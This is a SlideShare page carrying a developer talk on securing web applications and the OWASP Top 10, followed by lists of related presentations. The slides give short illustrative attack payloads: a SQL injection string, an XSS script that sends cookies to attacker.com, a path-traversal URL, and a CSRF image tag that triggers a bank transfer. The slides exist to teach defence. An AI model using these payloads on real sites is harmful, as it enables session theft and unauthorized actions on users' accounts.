SlideShare a Scribd company logo

Developing Secure Web Apps

Download as PPTX, PDF
Mark Garratt
Mark Garratt

Mark Garratt gave a presentation on developing secure web applications. He discussed his background working as a full stack developer and system administrator. He then covered Cyber-Duck's development process, including researching security considerations, continuous testing, and using configuration management with Puppet. Finally, he reviewed common vulnerabilities like injection, broken authentication, XSS, and the OWASP Top 10.

Internet
1 of 25
25/11/2014 Developing Secure Web Apps Mark Garratt
Introduction • Was: UH Student - Graduated 2012 • Now: Full Stack Developer at Cyber-Duck • Things I do: – Programmer: PHP, MySQL, Node.js (JavaScript), MongoDB, HTML/CSS etc. – System Administrator: Linux server management – Security Tester: Reviewing and testing web apps • Things I use: – TDD / BDD – Continuous Integration (Jenkins/Travis) – Vagrant + Docker 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 2
19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 3 Knowledge Transfer Partnerships “A relationship formed between a company and an academic institution ('Knowledge Base' partner), which facilitates the transfer of knowledge, technology and skills to which the company partner currently has no access. Each partnership employs one or more recently qualified people (known as an Associate) to work in a company on a project of strategic importance to the business, whilst also being supervised by the Knowledge Base Partner. Projects vary in length between 12 and 36 months. The Associates are either postgraduate researchers, university graduates, or individuals qualified to at least NVQ (Level 4) or equivalent.” WHEN YOU GRADUATE APPLY FOR THESE
This talk… • A bit about Cyber-Duck • The development process • Server security • Application security • Testing 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 4
About Cyber-Duck 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 5
Our Clients 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 6
The process • Research – Determine all security considerations for the project • User Experience – Follow best practices • Art Direction • Development – Design production environment – Secure coding – Continuous testing • Marketing • Support – Bug reports – More testing 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 7
Server Security • Type of server – Cloud, dedicated, shared, in-house • Server stack – Operating system – Language / Technology – Database / Caching – Scaling options • Protection – Anti-virus & Anti-malware – Firewalls & IPS – Back ups – Others… 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 8
Server Management • Most servers have similar configurations • More clients = more traffic = more servers • Need a way to keep all of them up to date • We use Configuration Management software • Several available, Ansible, Chef, Puppet, etc. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 9
We use Puppet • Master server hold config for all servers • Agent servers read their config every half an hour • Patch once, everything updates • Able to use with Vagrant for development 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 10
Application Security • Starts in the research phase of a project – Evaluate possible points of attack • UX design application with secure methods • Security is most relevant during Development – Be aware of vulnerabilities – Follow safe practices – Test for missed vulnerabilities • Post-launch continue testing – Bugs may reveal vulnerabilities – Bug-fixes may create vulnerabilities 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 11
Staying aware of vulnerabilities • Official lists and statistics – OWASP Top 10, CSA, etc. • Mailing lists • Industry news • Blogs • Social media – especially twitter • Common Vulnerability Scoring System (CVSS) – https://web.nvd.nist.gov/ - 3,365 vulnerabilities in the last 3 months 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 12
OWASP Top 10 A1 Injection A2 Broken Authentication and Session Management A3 Cross-Site Scripting (XSS) A4 Insecure Direct Object References A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 Cross-Site Request Forgery (CSRF) A9 Using Components with Known Vulnerabilities A10 Unvalidated Redirects and Forwards 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 13
Injection • Most common is SQL injection • Applications are vulnerable when user input is not validated Example: <?php $prod = $_POST[‘prod_id’]; $query = "SELECT * FROM users WHERE id LIKE '%$user%'"; $result = mysql_query($query); 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 14 user_id = "' OR 1; #" "SELECT * FROM users WHERE id LIKE '%' OR 1; #%'"
http://xkcd.com/327/ 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 15
Broken Authentication and Session Management • Misconfiguration of authentication and session management • Attackers use this to compromise passwords, keys, session tokens or other valuable data Example: Session Hijacking http://example.com/loggedin?sess_id=a1b2c3d4e5f6 Victim emails this link, whoever receives the link is logged in to the victims account 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 16
Cross-Site Scripting (XSS) • Occurs when un-validated user input is sent to the browser • Allows an attacker to execute scripts in the victims browser Example: Comment forms A comment is left: <script type=“text/javascript”> document.location = “http://attacker.com/post?cookie=“ + document.cookie; </script> 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 17
Insecure Direct Object References • Internal implementations are revealed to the user e.g. file location or database key • This is not properly protected allowing an attacker to manipulate the reference Example: http://example.com/user_uploads/my_image.png http://example.com/user_uploads/../../.htaccess 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 18
Security Misconfiguration • Several programs are required to run a single web application • Any one of these can have a vulnerability if misconfigured • Secure settings should be defined, implemented, and maintained, as defaults are often insecure. • Software should be kept up to date. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 19
Sensitive Data Exposure • Applications dealing with sensitive data must protect it • Suitable encryption or hashing must be used effectively • Data needs to be protected in transit and at rest Example: A website encrypts credit card data in the database using the built-in encryption mechanism. An injection vulnerability exists in the application allowing database data to be decrypted. If the application encrypted before storing the injection attack would only discover encrypted data. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 20
Missing Function Level Access Control • When a user logs in their access level is verified, this should also be verified on each subsequent request. Example: A website has user and admin areas, an attacker logs in as a user and is redirected to: http://example.com/user/dashboard They then go to the following URL with full access: http://example.com/admin 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 21
Cross-Site Request Forgery (CSRF) • An attacker tricks a user into sending data from one website to another. Example: A user is logged in to their bank account, which uses a session cookie. The user then visits an attackers website with the following code: <img src=“http://bank.com/transfer?to=12345&amount=100” /> The cookie is sent so bank.com thinks the user made the request. 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 22
Using Components with Known Vulnerabilities • Modern web applications are built with libraries, frameworks, plugins, etc. Vulnerabilities can exist in 3rd party code • Not updating these libraries may introduce vulnerabilities • Dependency managers (composer, npm, etc.) can help with this, but updates still need to be tested 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 23
Unvalidated Redirects and Forwards • Sometimes it’s necessary to redirect a user from one application page to another. These redirects need to be validated to avoid misuse. Example: http://example.com/login?redirect=dashboard Is changed by an attacker to http://example.com/login?redirect=admin 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 24
Questions? Contact Mark Garratt mark@cyber-duck.co.uk @MGarratt88 http://www.cyber-duck.co.uk 19/03/2015 © Copyright 2014 - Cyber-Duck Ltd. 25

Recommended

Securing Web Applications
Securing Web ApplicationsSecuring Web Applications
Securing Web ApplicationsMark Garratt
 
All your files now belong to us
All your files now belong to usAll your files now belong to us
All your files now belong to usPeter Wood
 
Red teaming in the cloud
Red teaming in the cloudRed teaming in the cloud
Red teaming in the cloudPeter Wood
 
The Cloud Security Rules
The Cloud Security RulesThe Cloud Security Rules
The Cloud Security RulesKai Roer
 
Practical SME Security on a Shoestring
Practical SME Security on a ShoestringPractical SME Security on a Shoestring
Practical SME Security on a ShoestringNCC Group
 
Web application firewall
Web application firewallWeb application firewall
Web application firewallAju Thomas
 
Getting the most from Application Security in your SOC by Leigh Collett
Getting the most from Application Security in your SOC by Leigh CollettGetting the most from Application Security in your SOC by Leigh Collett
Getting the most from Application Security in your SOC by Leigh CollettJorge Carrillo, Ph.D
 
Lessons from a Red Team Exercise
Lessons from a Red Team ExerciseLessons from a Red Team Exercise
Lessons from a Red Team ExercisePeter Wood
 

Recommended

Securing Web Applications
Securing Web ApplicationsSecuring Web Applications
Securing Web ApplicationsMark Garratt
 
All your files now belong to us
All your files now belong to usAll your files now belong to us
All your files now belong to usPeter Wood
 
Red teaming in the cloud
Red teaming in the cloudRed teaming in the cloud
Red teaming in the cloudPeter Wood
 
The Cloud Security Rules
The Cloud Security RulesThe Cloud Security Rules
The Cloud Security RulesKai Roer
 
Practical SME Security on a Shoestring
Practical SME Security on a ShoestringPractical SME Security on a Shoestring
Practical SME Security on a ShoestringNCC Group
 
Web application firewall
Web application firewallWeb application firewall
Web application firewallAju Thomas
 
Getting the most from Application Security in your SOC by Leigh Collett
Getting the most from Application Security in your SOC by Leigh CollettGetting the most from Application Security in your SOC by Leigh Collett
Getting the most from Application Security in your SOC by Leigh CollettJorge Carrillo, Ph.D
 
Lessons from a Red Team Exercise
Lessons from a Red Team ExerciseLessons from a Red Team Exercise
Lessons from a Red Team ExercisePeter Wood
 
The Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA PhiladelphiaThe Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA PhiladelphiaPatrick Sklodowski
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issuesErnest Staats
 
Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016Tim Willoughby
 
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...North Texas Chapter of the ISSA
 
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...Outpost24
 
Flight East 2018 Presentation–Data Breaches and the Law
Flight East 2018 Presentation–Data Breaches and the LawFlight East 2018 Presentation–Data Breaches and the Law
Flight East 2018 Presentation–Data Breaches and the LawSynopsys Software Integrity Group
 
ATP Technology Pillars
ATP Technology PillarsATP Technology Pillars
ATP Technology PillarsPriyanka Aash
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...Cloud Security Alliance Lviv Chapter
 
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...centralohioissa
 
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...Burton Lee
 
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...North Texas Chapter of the ISSA
 
Cyber Security Predictions 2016
Cyber Security Predictions 2016Cyber Security Predictions 2016
Cyber Security Predictions 2016Quick Heal Technologies Ltd.
 
Outpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust modelOutpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust modelOutpost24
 
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisLuncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisNorth Texas Chapter of the ISSA
 
HIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best PracticesHIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best PracticesHostway|HOSTING
 
Forrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust modelForrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust modelCristian Garcia G.
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24
 
Symantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global ResultsSymantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global ResultsSymantec
 
Integrating Doctrine with Laravel
Integrating Doctrine with LaravelIntegrating Doctrine with Laravel
Integrating Doctrine with LaravelMark Garratt
 
Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015Matt Gibson
 

More Related Content

What's hot

The Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA PhiladelphiaThe Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA PhiladelphiaPatrick Sklodowski
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issuesErnest Staats
 
Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016Tim Willoughby
 
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...North Texas Chapter of the ISSA
 
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...Outpost24
 
ATP Technology Pillars
ATP Technology PillarsATP Technology Pillars
ATP Technology PillarsPriyanka Aash
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...Cloud Security Alliance Lviv Chapter
 
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...centralohioissa
 
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...Burton Lee
 
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...North Texas Chapter of the ISSA
 
Outpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust modelOutpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust modelOutpost24
 
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisLuncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisNorth Texas Chapter of the ISSA
 
HIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best PracticesHIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best PracticesHostway|HOSTING
 
Forrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust modelForrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust modelCristian Garcia G.
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24
 
Symantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global ResultsSymantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global ResultsSymantec
 

What's hot (20)

The Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA PhiladelphiaThe Share Responsibility Model of Cloud Computing - ILTA Philadelphia
The Share Responsibility Model of Cloud Computing - ILTA Philadelphia
 
Tsc2021 cyber-issues
Tsc2021 cyber-issuesTsc2021 cyber-issues
Tsc2021 cyber-issues
 
Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016Tim Willoughby presentation to cloud workshop 2016
Tim Willoughby presentation to cloud workshop 2016
 
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
NTXISSACSC2 - Four Deadly Traps in Using Information Security Frameworks by D...
 
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
Outpost24 webinar - Why asset discovery is the missing link to enterprise vul...
 
Flight East 2018 Presentation–Data Breaches and the Law
Flight East 2018 Presentation–Data Breaches and the LawFlight East 2018 Presentation–Data Breaches and the Law
Flight East 2018 Presentation–Data Breaches and the Law
 
ATP Technology Pillars
ATP Technology PillarsATP Technology Pillars
ATP Technology Pillars
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of Software
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending Applications
 
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
Iurii Garasym - Cloud Security Alliance Now in Ukraine. Mission, Opportunitie...
 
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
Ken Czekaj & Robert Wright - Leveraging APM NPM Solutions to Compliment Cyber...
 
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
Marcel van der Heijden - SpeedInvest & Aircloak - EU GDPR & Data Privacy Comp...
 
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
NTXISSACSC2 - Information Security Opportunity: Embracing Big Data with Peopl...
 
Cyber Security Predictions 2016
Cyber Security Predictions 2016Cyber Security Predictions 2016
Cyber Security Predictions 2016
 
Outpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust modelOutpost24 webinar - Implications when migrating to a Zero Trust model
Outpost24 webinar - Implications when migrating to a Zero Trust model
 
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob DavisLuncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
Luncheon 2015-11-19 - Lessons Learned from Avid Life Media by Rob Davis
 
HIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best PracticesHIPAA 101 Compliance Threat Landscape & Best Practices
HIPAA 101 Compliance Threat Landscape & Best Practices
 
Forrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust modelForrester no more chewy centers- the zero trust model
Forrester no more chewy centers- the zero trust model
 
Outpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface managementOutpost24 webinar: best practice for external attack surface management
Outpost24 webinar: best practice for external attack surface management
 
Symantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global ResultsSymantec 2011 Social Media Protection Flash Poll Global Results
Symantec 2011 Social Media Protection Flash Poll Global Results
 

Viewers also liked

Integrating Doctrine with Laravel
Integrating Doctrine with LaravelIntegrating Doctrine with Laravel
Integrating Doctrine with LaravelMark Garratt
 
Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015Matt Gibson
 
Introduction to User Experience
Introduction to User ExperienceIntroduction to User Experience
Introduction to User ExperienceNeil Dawson
 
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i..."Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...Sylvain Reiter
 
rev 2 Final Presentation_Team 11
rev 2 Final Presentation_Team 11rev 2 Final Presentation_Team 11
rev 2 Final Presentation_Team 11Telson Erebor
 
Overcoming Command Line Allergies
Overcoming Command Line AllergiesOvercoming Command Line Allergies
Overcoming Command Line AllergiesElaine Nelson
 
Dc military tours otca
Dc military tours otcaDc military tours otca
Dc military tours otcadcmilitarytour
 
Helping Business Overview 2015
Helping Business Overview 2015Helping Business Overview 2015
Helping Business Overview 2015Celene Bakrins
 
Past simple presentation
Past simple presentationPast simple presentation
Past simple presentationmvreugdenhil
 

Viewers also liked (15)

Integrating Doctrine with Laravel
Integrating Doctrine with LaravelIntegrating Doctrine with Laravel
Integrating Doctrine with Laravel
 
Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015Designing Responsive Experiences - Digital Shoreditch - May 2015
Designing Responsive Experiences - Digital Shoreditch - May 2015
 
Introduction to User Experience
Introduction to User ExperienceIntroduction to User Experience
Introduction to User Experience
 
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i..."Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...
"Using SEO" presentation from Sylvain Reiter @ Business Media Insights 2014 i...
 
Persuasive technology
Persuasive technologyPersuasive technology
Persuasive technology
 
rev 2 Final Presentation_Team 11
rev 2 Final Presentation_Team 11rev 2 Final Presentation_Team 11
rev 2 Final Presentation_Team 11
 
150903 kurihara
150903 kurihara150903 kurihara
150903 kurihara
 
Overcoming Command Line Allergies
Overcoming Command Line AllergiesOvercoming Command Line Allergies
Overcoming Command Line Allergies
 
Dc military tours otca
Dc military tours otcaDc military tours otca
Dc military tours otca
 
Helping Business Overview 2015
Helping Business Overview 2015Helping Business Overview 2015
Helping Business Overview 2015
 
Business Plan
Business PlanBusiness Plan
Business Plan
 
Dorothy-Percy-2
Dorothy-Percy-2Dorothy-Percy-2
Dorothy-Percy-2
 
Derecho laboral.
Derecho laboral.Derecho laboral.
Derecho laboral.
 
Past simple presentation
Past simple presentationPast simple presentation
Past simple presentation
 
RAHUL_MUKHERJEE
RAHUL_MUKHERJEERAHUL_MUKHERJEE
RAHUL_MUKHERJEE
 

Similar to Developing Secure Web Apps

Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application SecurityPrateek Jain
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelinesZakaria SMAHI
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacysoftware-engineering-book
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareMyNOG
 
What is security testing and why it is so important?
What is security testing and why it is so important?What is security testing and why it is so important?
What is security testing and why it is so important?ONE BCG
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...Priyanka Aash
 
Chapter 3 Presentation
Chapter 3 PresentationChapter 3 Presentation
Chapter 3 PresentationAmy McMullin
 
How to develop an AppSec culture in your project
How to develop an AppSec culture in your project How to develop an AppSec culture in your project
How to develop an AppSec culture in your project 99X Technology
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalImperva
 
00. introduction to app sec v3
00. introduction to app sec v300. introduction to app sec v3
00. introduction to app sec v3Eoin Keary
 
Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Application Security Testing for Software Engineers: An approach to build sof...
Application Security Testing for Software Engineers: An approach to build sof...Michael Hidalgo
 
Fragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppFragments-Plug the vulnerabilities in your App
Fragments-Plug the vulnerabilities in your AppAppsecco
 

Similar to Developing Secure Web Apps (20)

Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 
Engineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacyEngineering Software Products: 7. security and privacy
Engineering Software Products: 7. security and privacy
 
Jonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdfJonathan Singer - Wheezing The Juice.pdf
Jonathan Singer - Wheezing The Juice.pdf
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
What is security testing and why it is so important?
What is security testing and why it is so important?What is security testing and why it is so important?
What is security testing and why it is so important?
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
 
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...
Detecting Malicious Cloud Account Behavior: A Look at the New Native Platform...
 
Owasp top 10 2013
